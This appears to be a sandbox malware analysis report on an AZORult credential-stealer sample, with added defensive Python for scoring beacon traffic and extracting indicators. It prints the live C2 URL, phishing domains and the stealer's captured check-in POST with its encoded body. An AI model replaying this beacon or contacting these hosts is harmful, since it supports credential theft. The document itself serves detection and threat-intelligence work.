Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Avira: detected |
Source: 00000000.00000002.544452351.00000000004B0000.00000004.00000001.sdmp |
Malware Configuration Extractor: Azorult {"C2 url": "http://admin.svapofit.com/azs/index.php"} |
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Virustotal: Detection: 68% |
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
ReversingLabs: Detection: 75% |
Source: http://ww1.survey-smiles.com/% |
Avira URL Cloud: Label: phishing |
Source: http://ww1.survey-smiles.com/e |
Avira URL Cloud: Label: phishing |
Source: http://ww1.survey-smiles.com/z |
Avira URL Cloud: Label: phishing |
Source: http://ww1.survey-smiles.com/sof |
Avira URL Cloud: Label: phishing |
Source: http://ww1.survey-smiles.com/ |
Avira URL Cloud: Label: phishing |
Source: admin.svapofit.com |
Virustotal: Detection: 9% |
Source: survey-smiles.com |
Virustotal: Detection: 7% |
Source: ww1.survey-smiles.com |
Virustotal: Detection: 8% |
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Joe Sandbox ML: detected |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: 0_2_0040A610 CryptUnprotectData,LocalFree, |
0_2_0040A610 |
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: 0_2_00413030 FindFirstFileW,FindNextFileW,FindClose, |
0_2_00413030 |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: 0_2_004119A8 FindFirstFileW,FindNextFileW,FindClose, |
0_2_004119A8 |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: 0_2_004119AC FindFirstFileW,FindNextFileW,FindClose, |
0_2_004119AC |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: 0_2_00412D6C FindFirstFileW,FindNextFileW,FindClose, |
0_2_00412D6C |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: 0_2_0041160C FindFirstFileW,FindNextFileW,FindClose, |
0_2_0041160C |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: 0_2_00413F58 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose, |
0_2_00413F58 |
Source: Traffic |
Snort IDS: 2029465 ET TROJAN Win32/AZORult V3.2 Client Checkin M15 192.168.2.3:49862 -> 63.141.242.43:80 |
Source: Malware configuration extractor |
URLs: http://admin.svapofit.com/azs/index.php |
Source: global traffic |
HTTP traffic detected: POST /azs/index.php HTTP/1.1 |
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) |
Host: admin.svapofit.com |
Content-Length: 101 |
Cache-Control: no-cache |
Data Raw: 4a 4f ed 3e 32 ed 3e 3c 89 28 39 fe 49 2f fb 38 2f fa 49 4c ed 3e 33 ed 3e 3e ed 3e 3b ed 3e 3e ed 3e 33 ed 3e 3a ed 3e 3d ed 3f 4e 89 28 39 fd 28 39 ff 4e 4e 8d 28 39 ff 28 39 f1 28 38 8c 4b 4c ed 3e 3d ed 3e 33 ed 3e 3d ed 3e 3a ed 3e 3d 8d 28 38 8c 28 39 fa 28 39 fc 4e 4b 89 28 39 fd 4f 49 ed 3e 3d |
Data Ascii: JO>2><(9I/8/IL>3>>>;>>>3>:>=?N(9(9NN(9(9(8KL>=>3>=>:>=(8(9(9NK(9OI>= |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1 |
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) |
Cache-Control: no-cache |
Host: survey-smiles.com |
Connection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1 |
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) |
Cache-Control: no-cache |
Connection: Keep-Alive |
Host: ww1.survey-smiles.com |
Cookie: sid=6f7a634c-1fe5-11ec-bde8-7dd40c08a176 |
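The check-in above has several traits worth keying on in proxy or PCAP logs: a POST to index.php over plain HTTP, the hard-coded "MSIE 6.0b" User-Agent, Cache-Control: no-cache, a fixed 101-byte body with no Content-Type, and body bytes that are not printable text. The following scorer is an added example written for this page; it is not the sandbox's own logic and not the Emerging Threats rule referenced by the Snort alert. The weights, the threshold and the benign comparison request are assumptions; the beacon body is the 101 bytes shown in Data Raw.

```python
"""Heuristic scoring of raw HTTP requests for AZORult-style check-in traffic.

Added example, not part of the sandbox report. Weights and threshold are
assumptions chosen by eye from the captured beacon.
"""
from __future__ import annotations

from dataclasses import dataclass, field

# User-Agent hard-coded in the captured beacon: an IE6 *beta* string that
# no current browser sends.
IE6B_UA = "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)"


@dataclass
class HttpRequest:
    method: str
    path: str
    headers: dict[str, str] = field(default_factory=dict)
    body: bytes = b""


def parse_request(raw: bytes) -> HttpRequest:
    """Split a raw HTTP/1.x request into method, path, lower-cased headers and body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers: dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return HttpRequest(method, path, headers, body)


def score_checkin(req: HttpRequest) -> tuple[int, list[str]]:
    """Return (score, reasons); each reason is one beacon trait that matched."""
    score, reasons = 0, []
    if req.method == "POST" and req.path.lower().endswith("index.php"):
        score += 2
        reasons.append("POST to index.php")
    if req.headers.get("user-agent") == IE6B_UA:
        score += 3
        reasons.append("hard-coded MSIE 6.0b User-Agent")
    if req.headers.get("cache-control", "").lower() == "no-cache":
        score += 1
        reasons.append("Cache-Control: no-cache")
    if req.method == "POST" and "content-type" not in req.headers:
        score += 2
        reasons.append("POST body without Content-Type")
    if req.body and not all(32 <= b < 127 for b in req.body):
        score += 2
        reasons.append("non-printable (likely XOR-encoded) body")
    if req.headers.get("content-length") == "101":
        score += 1
        reasons.append("101-byte first beacon")
    return score, reasons


def is_suspect(raw: bytes, threshold: int = 6) -> bool:
    """True when enough beacon traits line up (threshold is an assumption)."""
    score, _ = score_checkin(parse_request(raw))
    return score >= threshold


# Beacon body exactly as captured in the report (Data Raw, 101 bytes).
BEACON_BODY = bytes.fromhex(
    "4a4fed3e32ed3e3c892839fe492ffb382ffa494ced3e33ed3e3eed3e3bed3e3e"
    "ed3e33ed3e3aed3e3ded3f4e892839fd2839ff4e4e8d2839ff2839f128388c4b"
    "4ced3e3ded3e33ed3e3ded3e3aed3e3d8d28388c2839fa2839fc4e4b892839fd"
    "4f49ed3e3d"
)
BEACON = (
    b"POST /azs/index.php HTTP/1.1\r\n"
    + b"User-Agent: " + IE6B_UA.encode() + b"\r\n"
    + b"Host: admin.svapofit.com\r\n"
    + f"Content-Length: {len(BEACON_BODY)}\r\n".encode()
    + b"Cache-Control: no-cache\r\n\r\n"
    + BEACON_BODY
)

# Constructed benign form post for comparison (not from the report).
BENIGN_BODY = b"user=alice&pass=hunter2"
BENIGN = (
    b"POST /api/login HTTP/1.1\r\n"
    + b"Host: www.example.com\r\n"
    + b"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/120.0\r\n"
    + b"Content-Type: application/x-www-form-urlencoded\r\n"
    + f"Content-Length: {len(BENIGN_BODY)}\r\n".encode()
    + b"\r\n" + BENIGN_BODY
)

if __name__ == "__main__":
    for name, raw in (("beacon", BEACON), ("benign", BENIGN)):
        print(name, score_checkin(parse_request(raw)))
```

The User-Agent and the missing Content-Type carry most of the weight on purpose: the 101-byte length and the index.php path are the easiest things for a rebuilt sample to change, so they only nudge the score.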
Source: Joe Sandbox View |
ASN Name: NOCIXUS |
Source: Joe Sandbox View |
IP Address: 199.59.242.153 |
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544548107.0000000000719000.00000004.00000020.sdmp |
String found in binary or memory: http://admin.svapofit.= |
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544548107.0000000000719000.00000004.00000020.sdmp |
String found in binary or memory: http://admin.svapofit.com/ |
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544541498.0000000000714000.00000004.00000020.sdmp, 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000003.544083881.0000000002130000.00000004.00000001.sdmp |
String found in binary or memory: http://admin.svapofit.com/azs/index.php |
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544548107.0000000000719000.00000004.00000020.sdmp |
String found in binary or memory: http://admin.svapofit.com/azs/index.php8 |
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544548107.0000000000719000.00000004.00000020.sdmp |
String found in binary or memory: http://admin.svapofit.com/azs/index.phpSb |
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
String found in binary or memory: http://ip-api.com/json |
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544548107.0000000000719000.00000004.00000020.sdmp |
String found in binary or memory: http://survey-smiles.c-k |
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000003.543285229.000000000075E000.00000004.00000001.sdmp |
String found in binary or memory: http://survey-smiles.com |
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544548107.0000000000719000.00000004.00000020.sdmp |
String found in binary or memory: http://survey-smiles.com/ |
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544600574.000000000075D000.00000004.00000020.sdmp |
String found in binary or memory: http://survey-smiles.com/= |
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544548107.0000000000719000.00000004.00000020.sdmp |
String found in binary or memory: http://survey-smiles.com/csvc |
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544548107.0000000000719000.00000004.00000020.sdmp, 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544588869.0000000000754000.00000004.00000020.sdmp |
String found in binary or memory: http://ww1.survey-smiles.com/ |
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544588869.0000000000754000.00000004.00000020.sdmp |
String found in binary or memory: http://ww1.survey-smiles.com/% |
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544548107.0000000000719000.00000004.00000020.sdmp |
String found in binary or memory: http://ww1.survey-smiles.com/e |
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544588869.0000000000754000.00000004.00000020.sdmp |
String found in binary or memory: http://ww1.survey-smiles.com/sof |
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544600574.000000000075D000.00000004.00000020.sdmp |
String found in binary or memory: http://ww1.survey-smiles.com/z |
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
String found in binary or memory: http://www.icq.com/legal/eula/en |
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
String found in binary or memory: http://www.icq.com/legal/privacypolicy/en |
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
String found in binary or memory: https://dotbit.me/a/ |
Source: unknown |
HTTP traffic detected: POST /azs/index.php HTTP/1.1 |
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) |
Host: admin.svapofit.com |
Content-Length: 101 |
Cache-Control: no-cache |
Data Raw: 4a 4f ed 3e 32 ed 3e 3c 89 28 39 fe 49 2f fb 38 2f fa 49 4c ed 3e 33 ed 3e 3e ed 3e 3b ed 3e 3e ed 3e 33 ed 3e 3a ed 3e 3d ed 3f 4e 89 28 39 fd 28 39 ff 4e 4e 8d 28 39 ff 28 39 f1 28 38 8c 4b 4c ed 3e 3d ed 3e 33 ed 3e 3d ed 3e 3a ed 3e 3d 8d 28 38 8c 28 39 fa 28 39 fc 4e 4b 89 28 39 fd 4f 49 ed 3e 3d |
Data Ascii: JO>2><(9I/8/IL>3>>>;>>>3>:>=?N(9(9NN(9(9(8KL>=>3>=>:>=(8(9(9NK(9OI>= |
Source: unknown |
DNS traffic detected: queries for: admin.svapofit.com |
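The memory strings above mix real indicators with truncated or run-together fragments ("http://admin.svapofit.=", "http://survey-smiles.c-k", "index.php8"). Before these go into a blocklist, a practitioner wants to separate hosts the sample actually contacted (a DNS query or an HTTP Host header in the capture) from hosts that only exist as strings. The extractor below is an added example for this page, not tooling from the sandbox vendor; it parses the "finding: value" line layout used here, and the sample lines are copied from this report with the HTTP headers whitespace-separated. Fragments that do not parse as a complete hostname are dropped, not repaired.

```python
"""Collect network IOCs from sandbox-report lines and separate hosts that were
contacted (DNS query / HTTP Host header) from hosts seen only as memory strings.

Added example, not part of the sandbox report.
"""
from __future__ import annotations

import ipaddress
import json
import re
from urllib.parse import urlsplit

HOST_RE = re.compile(r"^(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\.)+[a-z]{2,}$", re.I)
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
CONFIG_RE = re.compile(r"Malware Configuration Extractor:\s*\w+\s*(\{.*\})")
STRING_RE = re.compile(r"String found in binary or memory:\s*(\S+)")
DNS_RE = re.compile(r"DNS traffic detected: queries for:\s*(\S+)")
# Expects headers to be whitespace separated, as in the cleaned-up lines.
HTTP_HOST_RE = re.compile(r"HTTP traffic detected:.*?\bHost:\s*([A-Za-z0-9.-]+)")


def clean_host(url_or_name: str) -> str | None:
    """Hostname of a URL (or bare name) if it is syntactically complete, else None."""
    if "//" not in url_or_name:
        url_or_name = "//" + url_or_name
    try:
        host = (urlsplit(url_or_name).hostname or "").lower().rstrip(".")
    except ValueError:
        return None
    return host if HOST_RE.match(host) else None


def extract_iocs(lines: list[str]) -> dict[str, list[str]]:
    c2_urls: set[str] = set()
    contacted: set[str] = set()
    candidates: set[str] = set()
    ips: set[str] = set()
    for raw in lines:
        line = raw.strip().rstrip("|").strip()
        if m := CONFIG_RE.search(line):
            cfg = json.loads(m.group(1))
            for v in cfg.values():
                if isinstance(v, str) and v.startswith("http"):
                    c2_urls.add(v)
                    if h := clean_host(v):
                        candidates.add(h)
        elif m := DNS_RE.search(line):
            if h := clean_host(m.group(1)):
                contacted.add(h)
        elif m := HTTP_HOST_RE.search(line):
            if h := clean_host(m.group(1)):
                contacted.add(h)
        elif m := STRING_RE.search(line):
            if h := clean_host(m.group(1)):
                candidates.add(h)
        for ip_text in IPV4_RE.findall(line):
            try:
                ip = ipaddress.ip_address(ip_text)
            except ValueError:
                continue
            if not ip.is_private:  # drops the sandbox client 192.168.2.3
                ips.add(ip_text)
    return {
        "c2_urls": sorted(c2_urls),
        "contacted_hosts": sorted(contacted),
        "string_only_hosts": sorted(candidates - contacted),
        "external_ips": sorted(ips, key=ipaddress.ip_address),
    }


# Lines copied from this report (HTTP headers separated by spaces).
SAMPLE_LINES = [
    'Malware Configuration Extractor: Azorult {"C2 url": "http://admin.svapofit.com/azs/index.php"} |',
    "Snort IDS: 2029465 ET TROJAN Win32/AZORult V3.2 Client Checkin M15 192.168.2.3:49862 -> 63.141.242.43:80 |",
    "HTTP traffic detected: POST /azs/index.php HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) Host: admin.svapofit.com Content-Length: 101 |",
    "HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) Cache-Control: no-cache Host: survey-smiles.com Connection: Keep-Alive |",
    "DNS traffic detected: queries for: admin.svapofit.com |",
    "IP Address: 199.59.242.153 |",
    "String found in binary or memory: http://admin.svapofit.= |",
    "String found in binary or memory: http://admin.svapofit.com/azs/index.php8 |",
    "String found in binary or memory: http://survey-smiles.c-k |",
    "String found in binary or memory: http://ww1.survey-smiles.com/sof |",
    "String found in binary or memory: http://ip-api.com/json |",
    "String found in binary or memory: https://dotbit.me/a/ |",
]

if __name__ == "__main__":
    print(json.dumps(extract_iocs(SAMPLE_LINES), indent=2))
```

ip-api.com and dotbit.me come out as string-only: the first is a public geolocation service the stealer queries and the second is a leftover from the family's older builds, so neither belongs on a blocklist without further evidence from the capture.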
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: 0_2_00417D84 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,InternetCrackUrlA,InternetOpenA,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,InternetCloseHandle, |
0_2_00417D84 |
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544526487.00000000006FA000.00000004.00000020.sdmp |
Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/> |
Source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.4b0000.2.unpack, type: UNPACKEDPE |
Matched rule: Azorult Payload Author: kevoreilly |
Source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.400000.0.raw.unpack, type: UNPACKEDPE |
Matched rule: Azorult Payload Author: kevoreilly |
Source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.400000.0.unpack, type: UNPACKEDPE |
Matched rule: Azorult Payload Author: kevoreilly |
Source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.4b0000.2.raw.unpack, type: UNPACKEDPE |
Matched rule: Azorult Payload Author: kevoreilly |
Source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.480000.1.unpack, type: UNPACKEDPE |
Matched rule: Azorult Payload Author: kevoreilly |
Source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.480000.1.raw.unpack, type: UNPACKEDPE |
Matched rule: Azorult Payload Author: kevoreilly |
Source: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, type: MEMORY |
Matched rule: Azorult Payload Author: kevoreilly |
Source: 00000000.00000002.544424238.0000000000480000.00000040.00000001.sdmp, type: MEMORY |
Matched rule: Azorult Payload Author: kevoreilly |
Source: 00000000.00000002.544452351.00000000004B0000.00000004.00000001.sdmp, type: MEMORY |
Matched rule: Azorult Payload Author: kevoreilly |
Source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.4b0000.2.unpack, type: UNPACKEDPE |
Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload |
Source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.400000.0.raw.unpack, type: UNPACKEDPE |
Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload |
Source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.400000.0.unpack, type: UNPACKEDPE |
Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload |
Source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.4b0000.2.raw.unpack, type: UNPACKEDPE |
Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload |
Source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.480000.1.unpack, type: UNPACKEDPE |
Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload |
Source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.480000.1.raw.unpack, type: UNPACKEDPE |
Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload |
Source: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, type: MEMORY |
Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload |
Source: 00000000.00000002.544424238.0000000000480000.00000040.00000001.sdmp, type: MEMORY |
Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload |
Source: 00000000.00000002.544452351.00000000004B0000.00000004.00000001.sdmp, type: MEMORY |
Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: String function: 00403BF4 appears 46 times |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: String function: 004062FC appears 42 times |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: String function: 00404E98 appears 86 times |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: String function: 00404EC0 appears 33 times |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: String function: 0040300C appears 32 times |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: String function: 004034E4 appears 32 times |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Process Stats: CPU usage > 98% |
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Mutant created: \Sessions\1\BaseNamedObjects\AE86A6D5-F9414907-A57CDE79-FF79707E-24CAA5BC7 |
Source: classification engine |
Classification label: mal100.troj.spyw.evad.winEXE@1/0@3/3 |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
File read: C:\Windows\System32\drivers\etc\hosts |
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Static PE information: More than 200 imports for KERNEL32.dll |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Unpacked PE file: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs CODE:ER;DATA:W;BSS:W;.idata:W;.reloc:R; |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: 0_2_0041A068 push 0041A08Eh; ret |
0_2_0041A086 |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: 0_2_0041A02C push 0041A05Ch; ret |
0_2_0041A054 |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: 0_2_0040E8D0 push 0040E905h; ret |
0_2_0040E8FD |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: 0_2_0040B164 push 0040B190h; ret |
0_2_0040B188 |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: 0_2_0040E908 push 0040E94Ah; ret |
0_2_0040E942 |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: 0_2_0040B12C push 0040B158h; ret |
0_2_0040B150 |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: 0_2_0040C136 push 0040C164h; ret |
0_2_0040C15C |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: 0_2_0040C138 push 0040C164h; ret |
0_2_0040C15C |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: 0_2_0040813C push 00408174h; ret |
0_2_0040816C |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: 0_2_004171E8 push 00417214h; ret |
0_2_0041720C |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: 0_2_0040C9EA push 0040CA18h; ret |
0_2_0040CA10 |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: 0_2_0040C9EC push 0040CA18h; ret |
0_2_0040CA10 |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: 0_2_0040E1A4 push 0040E1D0h; ret |
0_2_0040E1C8 |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: 0_2_0040B1B8 push 0040B1E4h; ret |
0_2_0040B1DC |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: 0_2_0040E25A push 0040E288h; ret |
0_2_0040E280 |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: 0_2_0040E25C push 0040E288h; ret |
0_2_0040E280 |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: 0_2_00414A28 push 00414A84h; ret |
0_2_00414A7C |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: 0_2_0040BAB8 push 0040BAE4h; ret |
0_2_0040BADC |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: 0_2_00409B54 push 00409BC8h; ret |
0_2_00409BC0 |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: 0_2_00409B78 push 00409BC8h; ret |
0_2_00409BC0 |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: 0_2_0040D378 push 0040D3A8h; ret |
0_2_0040D3A0 |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: 0_2_0040D37C push 0040D3A8h; ret |
0_2_0040D3A0 |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: 0_2_00413B7C push 00413BA8h; ret |
0_2_00413BA0 |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: 0_2_0040B3D8 push 0040B414h; ret |
0_2_0040B40C |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: 0_2_0040B3DC push 0040B414h; ret |
0_2_0040B40C |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: 0_2_004183E4 push 00418410h; ret |
0_2_00418408 |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: 0_2_0040BBEC push 0040BC18h; ret |
0_2_0040BC10 |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: 0_2_00409B90 push 00409BC8h; ret |
0_2_00409BC0 |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: 0_2_00413C10 push 00413C3Ch; ret |
0_2_00413C34 |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: 0_2_00404C1C push 00404C6Dh; ret |
0_2_00404C65 |
